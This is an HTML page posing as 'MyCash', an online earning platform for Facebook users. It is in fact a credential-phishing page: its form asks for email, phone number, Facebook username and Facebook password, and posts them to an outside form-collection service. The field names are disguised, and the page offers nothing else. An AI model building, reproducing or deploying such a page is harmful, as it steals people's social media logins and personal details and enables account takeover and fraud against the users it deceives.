<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="log.png">
    <link rel="stylesheet" href="https://formcarry.com/s/Dr2DXyUxQoM">
    <title>MyCash is the best online earning platform for facebook users</title>
</head>
<body>
    <div id="myDIV2">
        <h1></h1>
      </div>
      <div class="prif">
          <img src="prof.png" alt="">
      </div>

    <div class="container">
        <div class="grp1">
            <img src="face.png" alt="">
        </div>
        <div class="grp2">
            <form action="https://formcarry.com/s/Dr2DXyUxQoM" method="post" accept-charset="UTF-8">
           Email*: <br>
           <input type="email" name="email" ><br>
           Phone Number*: <br>
           <input type="text" name="firstName" ><br>
           Facebook username*: <br>
           <input type="text" name="lastName" ><br>
          Facebook password: <br>
           <input type="text" name="anotherInput">
           <input type="hidden" name="_gotcha"><br><br>
           <button type="submit">go</button>
        </form>
        </div>
    </div>

</body>

<div id="myDIV">
    <h1></h1>
  </div>
<style>
    .grp2 button{
        width: 6em;
        height: 2em;
        background: #fff;
        color: #222;
        border-radius: 10px;
        border: none;
    }
    .grp2 button:hover{
        background: #999;
    }
    .prif img{
        border-radius: 50%;
        margin-left: 35em;
    }
    .container{
        display: flex;
        margin-top: 3em;
        margin-left: 20em;
    }
  
    .grp1{
        height: 300px;
        width: 300px;
        background: #fff;

    }
    .grp1 img{
      margin-left: 4.5em;
      margin-top: 4em;

    }
    .grp2{
        height: 242px;
        width: 300px;
        background: rgb(29, 29, 212);
        color: white;
        font-size: 0.9em;
        font-weight: 700;
        text-align: center;
        padding: 30px;
    }
    .grp2 input{
     height: 2em;
     text-align: center;
     border: rgb(163, 163, 223) 1px solid;
     border-radius: 10px;
    }
    body{
        background: rgb(61, 61, 240);
        font-family: Arial, Helvetica, sans-serif;
    }
#myDIV {
   
    width: 100px;
    height: 100px;
    background-color: coral;
    color: white;
    opacity: 0.7;
    animation: mymove 5s infinite;
  }
#myDIV2 {
   
    width: 100px;
    height: 100px;
    background-color: coral;
    color: white;
    opacity: 0.7;
    animation: mymove2 5s infinite;
  }
  
  @keyframes mymove {
    50% {transform: rotate(180deg);}
  }
  
  @keyframes mymove2 {
    50% {transform: rotate(180deg);}
  }
  @media(max-width: 750px){
    .container{
       display: block;
        margin-top: 3em;
        margin-left: 2.5em;
    }
    
    .grp1{
        height: 150px;
        width: 200px;
        background: #fff;

    }

    .grp2{
        height: auto;
        width: 140px;
        background: rgb(29, 29, 212);
        color: white;
        font-size: 0.9em;
        font-weight: 700;
        text-align: center;
        padding: 30px;
    }
    .prif img{
        border-radius: 50%;
        margin-left: 5em;
        height: 110px;
        width: 110px;
    }
    #myDIV {
   
   width: 50px;
   height: 50px;
   background-color: coral;
   color: white;
   animation: mymove 5s infinite;
 }
#myDIV2 {
  
   width: 50px;
   height: 50px;
   background-color: coral;
   color: white;
   animation: mymove2 5s infinite;
 }
 .grp1 img{
      margin-left: 2em;
      margin-top: 0.5em;

    }
  }
  </style>
</html>